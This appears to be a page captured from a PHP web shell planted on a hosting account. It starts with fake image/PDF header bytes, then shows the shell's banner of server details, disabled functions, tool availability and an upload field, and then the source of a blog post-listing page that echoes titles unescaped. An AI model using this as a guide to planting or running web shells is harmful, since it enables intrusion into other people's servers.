ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/workathon.syoft.com/writer/ |
Upload File : |
<html> <head> <meta charset="utf-8"> <title>List of all posts</title> <!-- Latest compiled and minified CSS --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <!-- Optional theme --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"> <!-- Latest compiled and minified JavaScript --> <script src="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> <script src="//cdn.ckeditor.com/4.16.1/standard/ckeditor.js"></script> <style> *, *::after, *::before { box-sizing: border-box; } body { background: #949c4e; background: linear-gradient( 115deg, rgba(86, 216, 228, 1) 10%, rgba(159, 1, 234, 1) 90% ); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", Helvetica, Arial, sans-serif; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } html, body, .container { min-height: 100vh; } .center { display: flex; justify-content: center; align-items: center; } li.item { width: 27%; height: 20rem; margin: 2rem; background-color: #FFFFFF; display: inline-block; position: relative; margin-bottom: 4rem; border-radius: 4px 4px 0 0; box-shadow: 0 4px 6px 0 rgba(0, 0, 0, 0.3); } li:hover { box-shadow: 10px 14px 45px rgba(0, 0, 0, 0.1); } li .item-image { position: relative; line-height: 20rem; font-size: 5rem; text-align: center; } li .item-detail { padding: 0 1rem; left: 0px; top: 100%; position: absolute; height: 50px; line-height: 50px; width: 100%; background-color: #f2f2f2; font-size: 1rem; font-weight: strong; b { float: left; font-weight: bold; } em { float: right; color: #666; } box-shadow: 0 2px 3px rgba(0, 0, 0, 0.2); } li .item-detail:after { content: ""; display: table; clear: both; } li a { font-size: 1rem; text-decoration: none; color: #666; } li div { position: absolute; } @media screen and (max-width: 68.125em) { li.item { width: 41%; } } @media screen and (max-width: 46.125em) { li.item { width: 80%; } } </style> </head> <div> <div class="container"> <div class="text-right "> <h1 class="text-center p-3 ">Posts List</h1> <a href="posts.php"><button type="button" class="btn btn-primary mt-5 ">Add Blog</button></a> </div> <ul class="item-list"> <?php require 'utils.php'; $allposts = getAllPosts(); foreach ($allposts as $post) { echo ' <li class="item"> <div class="item-image" style="height: inherit;"><img class="item-image" style="height: inherit;width: -webkit-fill-available;" src="'.$post["featured_image"].'"/></div> <div class="item-detail"> <b><a href="https://syoft.com/writer/posts.php?post_edit_id='.$post["id"].'">'.$post["title"].'</a></b> </div> </li>'; }?> </ul> </div> </div> </html>